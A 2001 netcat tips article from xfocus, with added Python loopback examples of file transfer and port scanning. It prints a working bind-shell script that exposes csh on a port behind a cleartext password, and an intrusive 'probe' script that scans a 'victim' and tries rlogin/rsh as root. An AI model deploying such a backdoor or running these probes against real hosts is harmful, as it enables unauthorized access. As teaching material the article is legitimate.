Netcat (nc) usage tips
Created: 2001-03-02
Article type: original
Submitted by: Quack (QUACK_AT_XFOCUS.ORG)
By QUACK
http://www.xfocus.org (Security Focus)
Everyone should be familiar with this little tool by now; it has been around for years. I will skip the preamble and go straight to a few tricks, illustrated with some scripts.
(The scripts quoted in this article come from the nc110.tgz package.)
1. Basic usage
quack# nc -h
[v1.10]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -e prog                 program to exec after connect [dangerous!!]
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft (the help text)
        -i secs                 delay interval for lines sent, ports scanned
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -s addr                 local source address
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]
2. Transferring files: ncp
#! /bin/sh
## like rcp, but uses netcat on a high port
## do "ncp targetfile" on the machine that RECEIVES the file
## then do "ncp sourcefile receivinghost" on the machine that SENDS it
## if invoked as "nzp", the file is compressed for the transfer
## NOTE: if "targetfile" exists, it is overwritten
## define the port you want to use here; any free high port will do
MYPORT=23456

## if nc is not in the system path, uncomment and edit the next line
# PATH=${HOME}:${PATH} ; export PATH

## argument checking
test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=`echo $0 | sed 's+.*/++'`
test "$me" = "nzp" && echo '[compressed mode]'

# if there is a second arg, it is a host to send an [existing] file to
if test "$2" ; then
  test ! -f "$1" && echo "can't find $1" && exit 1
  if test "$me" = "nzp" ; then
    compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
  else
    nc -v -w 2 $2 $MYPORT < "$1" && exit 0
  fi
  echo "transfer FAILED!"
  exit 1
fi

# otherwise we are receiving: check whether a file of the same name
# already exists in the current directory on the receiving machine
if test -f "$1" ; then
  echo -n "Overwrite $1? "
  read aa
  test ! "$aa" = "y" && echo "[punted!]" && exit 1
fi
# 30 seconds oughta be pleeeenty of time, but change if you want
if test "$me" = "nzp" ; then
# note the usage here: a redirect combined with a pipeline
  nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0
else
  nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
fi
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $1 is already trashed
rm -f "$1"
exit 1
In practice: on machine A I simply run
quacka# ncp ../abcd
listening on [any] 23456 ...
then on the other machine, B:
quackb# ncp abcd 192.168.0.2
quackb [192.168.0.1] 23456 (?)
and on A you see
connect to [192.168.0.2] from quackb [192.168.0.1] 1027
#
Check, and the file has arrived. Keep in mind what the script does not do: whoever connects to port 23456 first is what ends up in the file, and nothing checks that the bytes arrived intact, so compare a checksum on both ends before trusting the result.
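To make the two halves of ncp concrete, here is an added example (not from the article and not from nc110.tgz) that re-does them with Python sockets so the exchange can be run on a single machine without netcat: a receiver that waits up to a timeout for exactly one connection and reads until EOF (nc -v -w 30 -p PORT -l), a sender that connects, pushes the file and half-closes (nc -v -w 2 HOST PORT < file), an nzp-style compressed mode, and the digest comparison ncp itself never performs. The loopback address, the use of an ephemeral port (0) and zlib standing in for compress(1) are assumptions made for this example.

```python
import hashlib
import socket
import threading
import zlib

# Added example, not part of the article or of nc110.tgz.  Loopback address,
# ephemeral port and zlib (in place of compress/uncompress) are assumptions.


def open_listener(port=0):
    """Bind the receiver's port (nc -l -p PORT).  Port 0 lets the OS pick one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv


def receive_file(srv, timeout):
    """Receiver half (nc -v -w TIMEOUT -p PORT -l > file): accept ONE
    connection within `timeout` seconds, read until the peer closes, and
    return the bytes.  Returns None if nobody connected in time.  Exactly
    like ncp, it takes whoever connects first: there is no authentication."""
    srv.settimeout(timeout)
    try:
        conn, _ = srv.accept()
    except socket.timeout:
        return None
    finally:
        srv.close()
    chunks = []
    with conn:
        conn.settimeout(timeout)
        while True:
            buf = conn.recv(65536)
            if not buf:          # peer closed its side: that is ncp's end of file
                break
            chunks.append(buf)
    return b"".join(chunks)


def send_file(host, port, data, timeout):
    """Sender half (nc -v -w 2 HOST PORT < file): connect, push everything,
    then half-close so the receiver sees EOF."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def ncp_roundtrip(data, compressed=False, timeout=5):
    """Run receiver and sender the way ncp/nzp would on two hosts, here in two
    threads.  Returns (bytes the receiver wrote, digest_matches).  The digest
    comparison is the check the shell script lacks: netcat cannot tell a
    truncated or tampered stream from a complete one."""
    srv = open_listener()
    port = srv.getsockname()[1]
    box = {}
    rx = threading.Thread(target=lambda: box.update(raw=receive_file(srv, timeout)))
    rx.start()
    payload = zlib.compress(data) if compressed else data   # nzp: compress -c
    send_file("127.0.0.1", port, payload, timeout)
    rx.join()
    raw = box["raw"]
    if raw is None:
        return None, False
    out = zlib.decompress(raw) if compressed else raw       # nzp: uncompress -c
    return out, sha256(out) == sha256(data)


if __name__ == "__main__":
    sample = b"constructed sample payload\n" * 1000
    got, ok = ncp_roundtrip(sample, compressed=True)
    print(len(got), "bytes received, digest match:", ok)
    print("no sender within 0.2s ->", receive_file(open_listener(), 0.2))
```

The timeout case is what `-w 30` buys you in the shell script: if no sender shows up, the receiver gives up instead of holding the port open indefinitely, and `receive_file` returns None rather than leaving an empty file behind.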
3. Binding a shell to a port: bsh
First, note that if you built netcat with a plain "make freebsd" (or the equivalent for your system), this will not work:
the -e option is only compiled in when GAPING_SECURITY_HOLE is defined (add -DGAPING_SECURITY_HOLE to DFLAGS in the Makefile before building).
#! /bin/sh
## a script that uses nc to bind a shell to a port, with password protection
## takes one argument, the port number
## nc must be built with GAPING_SECURITY_HOLE, otherwise there is no -e
NC=nc

case "$1" in
  ?* )
    LPN="$1"
    export LPN
    sleep 1
# note the nc usage here: -l listens, -e runs this same script on each connection
    echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &
    echo "launched on port $LPN"
    exit 0
  ;;
esac

# here we play inetd: re-arm the listener for the next client, then talk to
# the current one over stdin/stdout (which nc has connected to the socket)
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &

while read qq ; do
case "$qq" in
# weak password protection: the password is quack, and it crosses the wire in clear
  quack )
    cd /
    exec csh -i
  ;;
esac
done
How is it used?
quack# ./bsh 6666          <------- typed; what follows is program output
-l -p 6666 -e ./bsh
launched on port 6666
quack#
quack# nc localhost 6666   <------- typed
-l -p 6666 -e ./bsh
quack                      <------- typed: the password check
Warning: imported path contains relative components
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
cracker#
4. Port scanning: probe
Many of the port scanners in common use, VeteScan for example, are written as shell scripts, and many of them
require netcat to be installed on the system. Why? Look at the script below and you may understand.
#! /bin/sh
## launch a whole buncha crap at yon victim in no particular order; capture
## stderr and stdout in one place.  Run as root for rservice and low -p to work.
## Fairly thorough example of using netcat to collect a lot of host info.
## will set off every intrusion alarm in existence on a paranoid machine!

# various gadgets live in this directory
DDIR=../data
# where's a gateway?
GATE=192.157.69.11
# might conceivably wanna change this for different run styles
UCMD='nc -v -w 8'

test ! "$1" && echo needs victim arg && exit 1
echo '' | $UCMD -w 9 -r "$1" 13 79 6667 2>&1
echo '0' | $UCMD "$1" 79 2>&1
# if lsrr was passed thru, should get refusal here:
# careful here: these nc options (-z -r -g) can do a great deal
$UCMD -z -r -g $GATE "$1" 6473 2>&1
$UCMD -r -z "$1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2>&1
# -s `hostname` may be wrong for some multihomed machines
echo 'UDP echoecho!' | nc -u -p 7 -s `hostname` -w 3 "$1" 7 19 2>&1
echo '113,10158' | $UCMD -p 10158 "$1" 113 2>&1
rservice bin bin | $UCMD -p 1019 "$1" shell 2>&1
echo QUIT | $UCMD -w 8 -r "$1" 25 158 159 119 110 109 1109 142-144 220 23 2>&1
# newline after any telnet trash
echo ''
echo PASV | $UCMD -r "$1" 21 2>&1
echo 'GET /' | $UCMD -w 10 "$1" 80 81 210 70 2>&1
# sometimes contains useful directory info:
# you do know what robots.txt is, right? ;)
echo 'GET /robots.txt' | $UCMD -w 10 "$1" 80 2>&1
# now the big red lights go on
# rservice is another gadget; it is in the data directory of nc110.tgz
rservice bin bin 9600/9600 | $UCMD -p 1020 "$1" login 2>&1
rservice root root | $UCMD -r "$1" exec 2>&1
echo 'BEGIN big udp -- everything may look "open" if packet-filtered'
data -g < ${DDIR}/nfs-0.d | $UCMD -i 1 -u "$1" 2049 | od -x 2>&1
# no wait-time, uses RTT hack
nc -v -z -u -r "$1" 111 66-70 88 53 87 161-164 121-123 213 49 2>&1
nc -v -z -u -r "$1" 137-140 694-712 747-770 175-180 2103 510-530 2>&1
echo 'END big udp'
$UCMD -r -z "$1" 175-180 2000-2003 530-533 1524 1525 666 213 8000 6250 2>&1
# use our identd-sniffer!
iscan "$1" 21 25 79 80 111 53 6667 6000 2049 119 2>&1
# this gets pretty intrusive, but what the fuck.  probe for portmap first
if nc -w 5 -z -u "$1" 111 ; then
# using showmount and rpcinfo here is the kind of thing that gets you caught ;)
  showmount -e "$1" 2>&1
  rpcinfo -p "$1" 2>&1
fi
exit 0
There is not much more to say; the script explains itself. Of course, the script above is only an example, and if you actually use something like it, remember that
a scan of this kind leaves a great many traces and the system administrator will be paying attention ;)
Experiment more and think more, and you may find more uses for it. Have a look at the scripts directory in nc110.tgz;
there are a few more scripts there to get ideas from.
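The probe script relies on three netcat behaviours that the help text in section 1 only names: port-range expansion ("lo-hi"), zero-I/O scanning (-z with -w, optionally -r) and the "echo something | nc host port" banner grab. The following is an added example, written for this article and not taken from nc110.tgz, that re-implements those three in Python sockets so they can be exercised against constructed loopback listeners instead of a "victim". The loopback services, their banner strings and the helper names are all made up for this example.

```python
import random
import socket
import threading

# Added example, not from the article or from nc110.tgz.  The loopback
# "services" and their banners are constructed for this demonstration.


def expand_ports(spec, randomize=False):
    """nc-style port arguments: "80", "137-140", "1-20 540-550 95".
    randomize=True mimics -r (random order of the ports)."""
    ports = []
    for item in spec.split():
        if "-" in item:
            lo, hi = item.split("-", 1)
            ports.extend(range(int(lo), int(hi) + 1))
        else:
            ports.append(int(item))
    if randomize:
        random.shuffle(ports)
    return ports


def scan(host, spec, timeout=1.0, randomize=False):
    """nc -z -w TIMEOUT [-r] HOST PORTS: only connect(), never send or read.
    Returns {port: "open" | "refused" | "timeout" | "error"}.  A port behind
    a packet filter shows up as "timeout", not "refused": that silence is
    why probe warns that filtered hosts can make everything look open."""
    result = {}
    for port in expand_ports(spec, randomize):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            result[port] = "open"
        except ConnectionRefusedError:
            result[port] = "refused"
        except socket.timeout:
            result[port] = "timeout"
        except OSError:
            result[port] = "error"
        finally:
            s.close()
    return result


def banner(host, port, probe, timeout=2.0):
    """echo PROBE | nc -w TIMEOUT HOST PORT: send one line, collect whatever
    comes back until the peer closes or the timeout runs out.  None means
    the connection itself failed."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(probe)
            chunks = []
            while True:
                try:
                    buf = s.recv(4096)
                except socket.timeout:
                    break
                if not buf:
                    break
                chunks.append(buf)
            return b"".join(chunks)
    except OSError:
        return None


def fake_service(reply):
    """Constructed loopback service standing in for a real daemon: accept
    clients forever, read one request, answer with `reply`, close.
    Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            try:
                with conn:
                    conn.recv(1024)       # a -z scan closes here, sending nothing
                    conn.sendall(reply)
            except OSError:
                pass
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def closed_port():
    """A loopback port nothing listens on, to see what 'refused' looks like."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    web = fake_service(b"HTTP/1.0 200 OK\r\nServer: constructed-for-demo\r\n\r\n")
    dead = closed_port()
    print(scan("127.0.0.1", "%d %d" % (web, dead)))
    print(banner("127.0.0.1", web, b"GET /\r\n"))
```

Two things worth noticing when you run it: the scan of the "web" port leaves the fake service with an empty request, which is exactly the trace a -z sweep leaves in real daemons' logs, and the banner grab only works because the service closes after answering; a service that keeps the connection open is ended by the -w timeout, which is why probe sets one on every call.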